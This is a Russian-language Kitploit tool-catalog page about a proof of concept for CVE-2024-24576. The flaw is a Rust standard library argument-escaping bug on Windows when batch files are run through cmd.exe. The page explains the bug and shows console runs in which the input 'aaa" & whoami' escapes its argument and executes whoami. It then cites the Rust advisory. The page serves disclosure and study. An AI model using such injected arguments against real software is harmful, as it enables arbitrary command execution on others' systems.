Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2024-24576-PoC — Пример использования CVE-2024-24576. | Kitploit
Инструменты/GitHubGitHub/frostb1ten/cve-2024-24576-poc
Анализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийТестирование на ПроникновениеКомандование и Управление
GitHubfrostb1ten/cve-2024-24576-poc

CVE-2024-24576-PoC

Пример использования CVE-2024-24576.

Репозиторий
591012 лет назадПроверено Kitploit

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

CVE-2024-24576 PoC

API-интерфейсы Command::arg и Command::args в своей документации утверждают, что аргументы будут переданы запускаемому процессу как есть, независимо от содержимого аргументов, и не будут обрабатываться оболочкой. Это означает, что передавать недоверенные входные данные в качестве аргумента должно быть безопасно.

В Windows реализация этого сложнее, чем на других платформах, потому что Windows API предоставляет только одну строку, содержащую все аргументы запускаемого процесса, и разделять их должен сам запускаемый процесс. Большинство программ используют стандартный argv из C run-time, что на практике приводит к в значительной степени единообразному способу разделения аргументов.

Однако есть одно исключение: cmd.exe (используется, помимо прочего, для выполнения пакетных файлов), у которого собственная логика разделения аргументов. Это вынуждает стандартную библиотеку реализовывать собственное экранирование аргументов, передаваемых пакетным файлам. К сожалению, было сообщено, что наша логика экранирования была недостаточно тщательной, и можно было передать вредоносные аргументы, приводящие к произвольному выполнению команд в оболочке.

Запуск файла main.rs со следующими полезными нагрузками даёт

root@kitploit:~
C:\Users\frost\testing>cargo run
   Compiling testing v0.1.0 (C:\Users\frost\testing)
    Finished dev [unoptimized + debuginfo] target(s) in 0.49s
     Running `target\debug\testing.exe`
enter payload here
aaa
Output:
Argument received: aaa
root@kitploit:~
C:\Users\frost\testing>cargo run
    Finished dev [unoptimized + debuginfo] target(s) in 0.01s
     Running `target\debug\testing.exe`
enter payload here
aaa & whoami
Output:
Argument received: "aaa & whoami"
root@kitploit:~
C:\Users\frost\testing>cargo run
    Finished dev [unoptimized + debuginfo] target(s) in 0.01s
     Running `target\debug\testing.exe`
enter payload here
aaa" & whoami
Output:
Argument received: "aaa\"
desktop-8j2vk8b\frost

Обратите внимание на экранированный аргумент с " whoami

НЕ МОЯ НАХОДКА!

Источники: https://github.com/rust-lang/rust/security/advisories/GHSA-q455-m56c-85mh https://www.bleepingcomputer.com/news/security/critical-rust-flaw-enables-windows-command-injection-attacks/

Скачать инструмент